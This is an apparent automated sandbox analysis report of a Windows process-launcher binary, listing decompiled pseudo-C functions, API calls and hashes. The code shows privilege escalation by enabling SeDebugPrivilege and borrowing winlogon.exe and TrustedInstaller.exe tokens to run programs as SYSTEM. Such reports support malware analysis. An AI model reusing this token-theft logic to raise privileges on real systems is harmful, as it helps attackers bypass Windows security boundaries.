                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                • API String ID: 2452314994-435178042
                                                                                                                • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                                                				char _v0;
                                                                                                                				WCHAR* _v4;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t76;
                                                                                                                				void* _t82;
                                                                                                                				wchar_t* _t85;
                                                                                                                				void* _t86;
                                                                                                                				void* _t87;
                                                                                                                				intOrPtr _t92;
                                                                                                                				wchar_t* _t93;
                                                                                                                				intOrPtr _t95;
                                                                                                                				int _t106;
                                                                                                                				char* _t110;
                                                                                                                				intOrPtr _t115;
                                                                                                                				wchar_t* _t117;
                                                                                                                				intOrPtr _t124;
                                                                                                                				wchar_t* _t125;
                                                                                                                				intOrPtr _t131;
                                                                                                                				wchar_t* _t132;
                                                                                                                				int _t154;
                                                                                                                				int _t156;
                                                                                                                				void* _t159;
                                                                                                                				intOrPtr _t162;
                                                                                                                				void* _t177;
                                                                                                                				void* _t178;
                                                                                                                				void* _t179;
                                                                                                                				intOrPtr _t181;
                                                                                                                				int _t187;
                                                                                                                				intOrPtr _t188;
                                                                                                                				intOrPtr _t190;
                                                                                                                				intOrPtr _t198;
                                                                                                                				signed int _t205;
                                                                                                                				signed int _t206;
                                                                                                                
                                                                                                                				_t179 = __edx;
                                                                                                                				_t158 = __ecx;
                                                                                                                				_t206 = _t205 & 0xfffffff8;
                                                                                                                				E0040B550(0x1ccc, __ecx);
                                                                                                                				_t76 = E0040313D(_t158);
                                                                                                                				if(_t76 != 0) {
                                                                                                                					E0040AC52();
                                                                                                                					SetErrorMode(0x8001); // executed
                                                                                                                					_t156 = 0;
                                                                                                                					 *0x40fa70 = 0x11223344;
                                                                                                                					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                                                					_t82 = E00405497( &_a8);
                                                                                                                					_a48 = 0x20;
                                                                                                                					_a40 = 0;
                                                                                                                					_a52 = 0;
                                                                                                                					_a44 = 0;
                                                                                                                					_a56 = 0;
                                                                                                                					E004056B5(_t158, __eflags, _t82, _a12); // executed
                                                                                                                					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                                                					 *_t206 = L"/SpecialRun";
                                                                                                                					_t85 = E0040585C( &_v0);
                                                                                                                					__eflags = _t85;
                                                                                                                					if(_t85 != 0) {
                                                                                                                						L8:
                                                                                                                						_t86 = E0040585C( &_a8, L"/Run");
                                                                                                                						__eflags = _t86 - _t156;
                                                                                                                						if(_t86 < _t156) {
                                                                                                                							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                                                							__eflags = _t87 - _t156;
                                                                                                                							if(_t87 >= _t156) {
                                                                                                                								_t162 =  *0x40fa74; // 0x4101c8
                                                                                                                								_t41 = _t87 + 1; // 0x1
                                                                                                                								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                                                								_t115 =  *0x40fa74; // 0x4101c8
                                                                                                                								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                                                								__eflags = _t117;
                                                                                                                								if(_t117 == 0) {
                                                                                                                									_a92 = _t156;
                                                                                                                									memset( &_a94, _t156, 0x208);
                                                                                                                									_a620 = _t156;
                                                                                                                									memset( &_a622, _t156, 0x208);
                                                                                                                									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                                                									_t124 =  *0x40fa74; // 0x4101c8
                                                                                                                									_t125 = _t124 + 0x5504;
                                                                                                                									_v4 = _t125;
                                                                                                                									_t187 = wcslen(_t125);
                                                                                                                									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                                                									__eflags = _t187 + _t51 - 0x104;
                                                                                                                									if(_t187 + _t51 >= 0x104) {
                                                                                                                										_a620 = _t156;
                                                                                                                									} else {
                                                                                                                										E00404BE4( &_a620,  &_a92, _v4);
                                                                                                                									}
                                                                                                                									_t131 =  *0x40fa74; // 0x4101c8
                                                                                                                									_t132 = _t131 + 0x5504;
                                                                                                                									__eflags = _t132;
                                                                                                                									wcscpy(_t132,  &_a620);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							E00402F31(_t156);
                                                                                                                							_t181 =  *0x40fa74; // 0x4101c8
                                                                                                                							_pop(_t159);
                                                                                                                							_a84 =  &_a8;
                                                                                                                							_a76 = 0x40cb0c;
                                                                                                                							_a88 = _t156;
                                                                                                                							_a80 = _t156;
                                                                                                                							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                                                							_t92 =  *0x40fa74; // 0x4101c8
                                                                                                                							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                                                							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                                                								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                                                								__eflags = _t93;
                                                                                                                								if(_t93 < 0) {
                                                                                                                									E00406420();
                                                                                                                									__imp__CoInitialize(_t156);
                                                                                                                									_t95 =  *0x40fa74; // 0x4101c8
                                                                                                                									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                                                									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                                                									_t198 =  *0x40fa74; // 0x4101c8
                                                                                                                									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                                                									E00402F31(1);
                                                                                                                									__imp__CoUninitialize();
                                                                                                                								} else {
                                                                                                                									E004065BE(_t159);
                                                                                                                								}
                                                                                                                								goto L7;
                                                                                                                							} else {
                                                                                                                								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                                                								_a7356 = _t156;
                                                                                                                								_a7352 = _t156;
                                                                                                                								_a7340 = _t156;
                                                                                                                								_a7344 = _t156;
                                                                                                                								_a7348 = _t156;
                                                                                                                								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                                                								_t110 =  &_a5288;
                                                                                                                								L6:
                                                                                                                								E004035FB(_t110);
                                                                                                                								L7:
                                                                                                                								E004054B9( &_v0);
                                                                                                                								E004099D4( &_a32);
                                                                                                                								E004054B9( &_v0);
                                                                                                                								_t106 = _t156;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t26 = _t86 + 1; // 0x1
                                                                                                                						_t173 = _t26;
                                                                                                                						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							E00402F31(_t156);
                                                                                                                						} else {
                                                                                                                							E00402FC6(_t173, __eflags, _t138);
                                                                                                                						}
                                                                                                                						_t188 =  *0x40fa74; // 0x4101c8
                                                                                                                						_a68 =  &_a8;
                                                                                                                						_a60 = 0x40cb0c;
                                                                                                                						_a72 = _t156;
                                                                                                                						_a64 = _t156;
                                                                                                                						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                                                						_t190 =  *0x40fa74; // 0x4101c8
                                                                                                                						_a5280 = _t156;
                                                                                                                						_a5276 = _t156;
                                                                                                                						_a5264 = _t156;
                                                                                                                						_a5268 = _t156;
                                                                                                                						_a5272 = _t156;
                                                                                                                						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                                                						_t110 =  &_a3212;
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					__eflags = _a56 - 3;
                                                                                                                					if(_a56 != 3) {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					__eflags = 1;
                                                                                                                					_a3212 = 0;
                                                                                                                					_a3208 = 0;
                                                                                                                					_a3196 = 0;
                                                                                                                					_a3200 = 0;
                                                                                                                					_a3204 = 0;
                                                                                                                					_v4 = 0;
                                                                                                                					_v0 = 0;
                                                                                                                					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                                                					_t177 = 2;
                                                                                                                					_push(E0040584C( &_v0, _t177));
                                                                                                                					L0040B1F8();
                                                                                                                					_pop(_t178);
                                                                                                                					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
                                                                                                                					_t156 = _t154;
                                                                                                                					_t110 =  &_a1132;
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					_t106 = _t76 + 1;
                                                                                                                					L2:
                                                                                                                					return _t106;
                                                                                                                				}
                                                                                                                			}

                                                                                                                0x00408678
                                                                                                                0x00408860
                                                                                                                0x00408695
                                                                                                                0x00408695
                                                                                                                0x0040869f
                                                                                                                0x004086a2
                                                                                                                0x004086af
                                                                                                                0x004086a4
                                                                                                                0x004086a7
                                                                                                                0x004086a7
                                                                                                                0x004086b4
                                                                                                                0x004086bf
                                                                                                                0x004086cb
                                                                                                                0x004086d3
                                                                                                                0x004086d7
                                                                                                                0x004086db
                                                                                                                0x004086e0
                                                                                                                0x004086f1
                                                                                                                0x004086f8
                                                                                                                0x004086ff
                                                                                                                0x00408706
                                                                                                                0x0040870d
                                                                                                                0x00408719
                                                                                                                0x0040871b
                                                                                                                0x00000000
                                                                                                                0x0040871b
                                                                                                                0x004085d5
                                                                                                                0x004085da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004085ec
                                                                                                                0x004085ef
                                                                                                                0x004085f6
                                                                                                                0x004085fd
                                                                                                                0x00408604
                                                                                                                0x0040860b
                                                                                                                0x00408612
                                                                                                                0x00408616
                                                                                                                0x00408620
                                                                                                                0x0040862a
                                                                                                                0x00408632
                                                                                                                0x00408633
                                                                                                                0x00408638
                                                                                                                0x0040864a
                                                                                                                0x0040864f
                                                                                                                0x00408651
                                                                                                                0x00000000
                                                                                                                0x0040854f
                                                                                                                0x0040854f
                                                                                                                0x00408550
                                                                                                                0x00408556
                                                                                                                0x00408556

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                  • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                  • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                  • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
                                                                                                                • swscanf.MSVCRT ref: 00408620
                                                                                                                • _wtoi.MSVCRT ref: 00408633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                • API String ID: 3933224404-3784219877
                                                                                                                • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                                                				int _v8;
                                                                                                                				long _v12;
                                                                                                                				wchar_t* _v16;
                                                                                                                				void _v546;
                                                                                                                				long _v548;
                                                                                                                				void _v1074;
                                                                                                                				char _v1076;
                                                                                                                				void* __esi;
                                                                                                                				long _t84;
                                                                                                                				int _t87;
                                                                                                                				wchar_t* _t88;
                                                                                                                				int _t92;
                                                                                                                				void* _t93;
                                                                                                                				int _t94;
                                                                                                                				int _t96;
                                                                                                                				int _t99;
                                                                                                                				int _t104;
                                                                                                                				long _t105;
                                                                                                                				int _t110;
                                                                                                                				void** _t112;
                                                                                                                				int _t113;
                                                                                                                				intOrPtr _t131;
                                                                                                                				wchar_t* _t132;
                                                                                                                				int* _t148;
                                                                                                                				wchar_t* _t149;
                                                                                                                				int _t151;
                                                                                                                				void* _t152;
                                                                                                                				void* _t153;
                                                                                                                				int _t154;
                                                                                                                				void* _t155;
                                                                                                                				long _t160;
                                                                                                                
                                                                                                                				_t145 = __edx;
                                                                                                                				_t152 = __ecx;
                                                                                                                				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                                                				_v12 = 0;
                                                                                                                				if(_t131 != 4) {
                                                                                                                					__eflags = _t131 - 5;
                                                                                                                					if(_t131 != 5) {
                                                                                                                						__eflags = _t131 - 9;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							__eflags = _t131 - 8;
                                                                                                                							if(_t131 != 8) {
                                                                                                                								__eflags = _t131 - 6;
                                                                                                                								if(_t131 != 6) {
                                                                                                                									__eflags = _t131 - 7;
                                                                                                                									if(_t131 != 7) {
                                                                                                                										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                                                									} else {
                                                                                                                										_t132 = __eax + 0x46b6;
                                                                                                                										_t148 = __eax + 0x48b6;
                                                                                                                										__eflags =  *_t148;
                                                                                                                										_v16 = _t132;
                                                                                                                										_v8 = __eax + 0x4ab6;
                                                                                                                										if( *_t148 == 0) {
                                                                                                                											_t88 = wcschr(_t132, 0x40);
                                                                                                                											__eflags = _t88;
                                                                                                                											if(_t88 != 0) {
                                                                                                                												_t148 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										_t153 = _t152 + 0x800;
                                                                                                                										E0040289F(_t153);
                                                                                                                										_t154 =  *(_t153 + 0xc);
                                                                                                                										__eflags = _t154;
                                                                                                                										if(_t154 == 0) {
                                                                                                                											_t87 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                										} else {
                                                                                                                											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                										}
                                                                                                                										__eflags = _t87;
                                                                                                                									}
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t84 = GetLastError();
                                                                                                                										L43:
                                                                                                                										_v12 = _t84;
                                                                                                                									}
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                								__eflags = _t92;
                                                                                                                								if(_t92 != 0) {
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								_t84 = _a28;
                                                                                                                								goto L43;
                                                                                                                							}
                                                                                                                							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                                                							__eflags = _t93;
                                                                                                                							if(_t93 != 0) {
                                                                                                                								E00401306(_t93); // executed
                                                                                                                							}
                                                                                                                							_v8 = 0;
                                                                                                                							_t94 = E00401F04(_t145, _t152); // executed
                                                                                                                							__eflags = _t94;
                                                                                                                							_v12 = _t94;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                                                								__eflags = _t96;
                                                                                                                								_v12 = _t96;
                                                                                                                								if(_t96 == 0) {
                                                                                                                									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                									__eflags = _t99;
                                                                                                                									if(_t99 == 0) {
                                                                                                                										_v12 = GetLastError();
                                                                                                                									}
                                                                                                                									CloseHandle(_v8); // executed
                                                                                                                								}
                                                                                                                								RevertToSelf(); // executed
                                                                                                                							}
                                                                                                                							goto L44;
                                                                                                                						}
                                                                                                                						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                                                						__eflags = _t104;
                                                                                                                						if(_t104 == 0) {
                                                                                                                							goto L44;
                                                                                                                						}
                                                                                                                						_v8 = 0;
                                                                                                                						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					_t149 = __eax + 0x44ac;
                                                                                                                					_t110 = wcslen(_t149);
                                                                                                                					__eflags = _t110;
                                                                                                                					if(_t110 <= 0) {
                                                                                                                						goto L44;
                                                                                                                					} else {
                                                                                                                						_v8 = 0;
                                                                                                                						__eflags = E00404EA9(_t149, _t110);
                                                                                                                						_t112 =  &_v8;
                                                                                                                						_push(_t112);
                                                                                                                						_push(_t149);
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_push(_t152);
                                                                                                                							_t113 = E00401DF9(_t145, __eflags);
                                                                                                                						} else {
                                                                                                                							L0040B1F8();
                                                                                                                							_push(_t112);
                                                                                                                							_push(_t152);
                                                                                                                							_t113 = E00401E44();
                                                                                                                						}
                                                                                                                						_v12 = _t113;
                                                                                                                						__eflags = _t113;
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v548 = 0;
                                                                                                                					memset( &_v546, 0, 0x208);
                                                                                                                					_v1076 = 0;
                                                                                                                					memset( &_v1074, 0, 0x208);
                                                                                                                					E00404C3C( &_v548);
                                                                                                                					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                                                					_t151 = wcslen(??);
                                                                                                                					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                                                					_t159 = _t151 + _t10 - 0x104;
                                                                                                                					if(_t151 + _t10 >= 0x104) {
                                                                                                                						_v1076 = 0;
                                                                                                                					} else {
                                                                                                                						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                                                					}
                                                                                                                					_v8 = 0;
                                                                                                                					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                                                					L14:
                                                                                                                					_t160 = _t105;
                                                                                                                					_v12 = _t105;
                                                                                                                					L15:
                                                                                                                					if(_t160 == 0) {
                                                                                                                						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                                                							_v12 = GetLastError();
                                                                                                                						}
                                                                                                                						CloseHandle(_v8);
                                                                                                                					}
                                                                                                                					L44:
                                                                                                                					return _v12;
                                                                                                                				}
                                                                                                                			}



































                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040201D
                                                                                                                • memset.MSVCRT ref: 00402035
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00402050
                                                                                                                • wcslen.MSVCRT ref: 0040205F
                                                                                                                • wcslen.MSVCRT ref: 004020B4
                                                                                                                • _wtoi.MSVCRT ref: 004020D7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                  • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                  • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                  • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                  • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                  • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                • wcschr.MSVCRT ref: 00402259
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004022B8
                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                • API String ID: 3201562063-2355939583
                                                                                                                • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				char _v16;
                                                                                                                				char _v24;
                                                                                                                				char _v32;
                                                                                                                				char _v40;
                                                                                                                				char _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				char _v576;
                                                                                                                				long _v580;
                                                                                                                				intOrPtr _v1112;
                                                                                                                				long _v1128;
                                                                                                                				void _v1132;
                                                                                                                				void* _v1136;
                                                                                                                				void _v1658;
                                                                                                                				char _v1660;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t41;
                                                                                                                				long _t49;
                                                                                                                				void* _t50;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				struct HINSTANCE__* _t68;
                                                                                                                				void* _t71;
                                                                                                                				void* _t83;
                                                                                                                				void* _t84;
                                                                                                                				void* _t85;
                                                                                                                
                                                                                                                				_t78 = _a4;
                                                                                                                				E004099D4(_a4 + 0x28);
                                                                                                                				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                				_v12 = _t41;
                                                                                                                				memset( &_v1132, 0, 0x228);
                                                                                                                				_t84 = _t83 + 0xc;
                                                                                                                				_v1136 = 0x22c;
                                                                                                                				Process32FirstW(_v12,  &_v1136); // executed
                                                                                                                				while(Process32NextW(_v12,  &_v1136) != 0) {
                                                                                                                					E004090AF( &_v580);
                                                                                                                					_t49 = _v1128;
                                                                                                                					_v580 = _t49;
                                                                                                                					_v52 = _v1112;
                                                                                                                					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                                                					_v8 = _t50;
                                                                                                                					if(_t50 != 0) {
                                                                                                                						L4:
                                                                                                                						_v1660 = 0;
                                                                                                                						memset( &_v1658, 0, 0x208);
                                                                                                                						_t85 = _t84 + 0xc;
                                                                                                                						E004098F9(_t78, _v8,  &_v1660);
                                                                                                                						if(_v1660 != 0) {
                                                                                                                							L10:
                                                                                                                							E0040920A( &_v576,  &_v1660);
                                                                                                                							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                                							_t84 = _t85 + 0x14;
                                                                                                                							CloseHandle(_v8);
                                                                                                                							_t78 = _a4;
                                                                                                                							L11:
                                                                                                                							E004099ED(_t78 + 0x28,  &_v580);
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_v16 = 0x104;
                                                                                                                						if( *0x41c8e0 == 0) {
                                                                                                                							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                							if(_t68 != 0) {
                                                                                                                								 *0x41c8e0 = 1;
                                                                                                                								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t66 =  *0x41c8e4;
                                                                                                                						if(_t66 != 0) {
                                                                                                                							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                                                					_v8 = _t71;
                                                                                                                					if(_t71 == 0) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				return CloseHandle(_v12);
                                                                                                                			}






























                                                                                                                APIs
                                                                                                                  • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                • memset.MSVCRT ref: 0040962E
                                                                                                                • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                • memset.MSVCRT ref: 004096C6
